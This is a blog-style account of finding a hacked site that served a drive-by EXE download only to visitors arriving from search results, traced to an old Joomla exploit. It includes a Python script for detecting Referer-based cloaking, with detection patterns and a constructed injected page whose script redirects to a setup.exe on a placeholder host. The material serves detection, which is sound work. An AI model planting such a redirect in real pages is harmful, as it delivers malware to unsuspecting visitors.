While doing a search for something innocuous, I found a search result that was very out of place. The domain was nothing related to what I was searching for, and the text abstract was, to say the least, spammy. Although I know you’re not supposed to click things like that, I figure I’m pretty secure, so I clicked it.
I was immediately shown a page that said my download would start in 0 seconds, then I was prompted to download an EXE file. Uh huh. I browsed to the root domain and it really was a legitimate website. So now, I wanted to figure out how this happened. I navigated to the hacked page and I didn’t get any download prompt. I went back to the search results and clicked again – I got the download prompt. Hmmm. More attempts and sometimes the site would send me to a dead page.
I looked very hard at the source code and couldn’t find the script that was being injected, but I could see there was a comment <!--counter--> that was getting replaced with the download redirect. I did a site search on Bing and found many, many, many pages on their website that were suspect. Also, I saw actual website pages that were in PHP.
So, I had to conclude that the website had a hacked version of PHP, and if that was compromised, the server could do anything it wanted, including checking for referrers and replacing tags in the source code files. The best I could do was email them and let them know they were hacked and that they had to have their webmaster fix it for them.
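The manual check described above (the page looks clean when visited directly but serves a download redirect when arriving from a search engine) can be automated. The following is an added example, not code from the original post: it fetches a URL once without a Referer and once with a search-engine Referer, diffs the two responses, and reports scripts, meta refreshes, EXE links or location changes that appear only in the referred copy. The Referer value, the sample pages and the example.invalid host are constructed for the demonstration.

```python
"""Referrer-cloaking check: compare a page fetched with and without a
search-engine Referer and flag content that appears only in the referred copy."""
import difflib
import re
import urllib.request

# Assumed search-engine referrer; any search result page URL would do.
SEARCH_REFERER = "https://www.bing.com/search?q=example"

# Markup that commonly carries a drive-by download or redirect.
SUSPECT_PATTERNS = [
    re.compile(r"<script[^>]*>.*?</script>", re.I | re.S),
    re.compile(r'<meta[^>]+http-equiv=["\']?refresh', re.I),
    re.compile(r'href=["\'][^"\']+\.exe["\']', re.I),
    re.compile(r"location\s*=\s*['\"][^'\"]+", re.I),
]

def http_fetch(url, referer=None):
    """Fetch a page with a browser-like User-Agent and an optional Referer."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    if referer:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", errors="replace")

def find_suspects(html):
    """Return every match of the suspect patterns in the given HTML."""
    return [m.group(0) for pat in SUSPECT_PATTERNS for m in pat.finditer(html)]

def cloaking_report(url, fetch=http_fetch, referer=SEARCH_REFERER):
    """Fetch twice and report lines and suspect markup unique to the referred copy."""
    plain = fetch(url, None)
    referred = fetch(url, referer)
    diff = difflib.ndiff(plain.splitlines(), referred.splitlines())
    added_lines = [line[2:] for line in diff if line.startswith("+ ")]
    new_suspects = sorted(set(find_suspects(referred)) - set(find_suspects(plain)))
    return {"differs": plain != referred,
            "added_lines": added_lines,
            "new_suspects": new_suspects}

# Constructed sample pages (not real captures): the referred copy has the
# <!--counter--> placeholder swapped for a redirect to an EXE.
CLEAN_PAGE = "<html><body><h1>Welcome</h1>\n<!--counter-->\n<p>Content</p></body></html>"
INJECTED_PAGE = CLEAN_PAGE.replace(
    "<!--counter-->", '<script>location="http://example.invalid/setup.exe"</script>')

def fake_fetch(url, referer=None):
    """Offline stand-in for http_fetch that cloaks on the Referer header."""
    return INJECTED_PAGE if referer else CLEAN_PAGE

if __name__ == "__main__":
    print(cloaking_report("http://example.invalid/page", fetch=fake_fetch))
```

Run it against a real site by dropping the fetch argument; a non-empty new_suspects list is the signal to start looking at the server, not the static files.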
Upon further research, it looks like it was a Joomla exploit from a couple of years ago. I passed that info along and hopefully the website owners can make the updates needed (and clean up all the extra pages).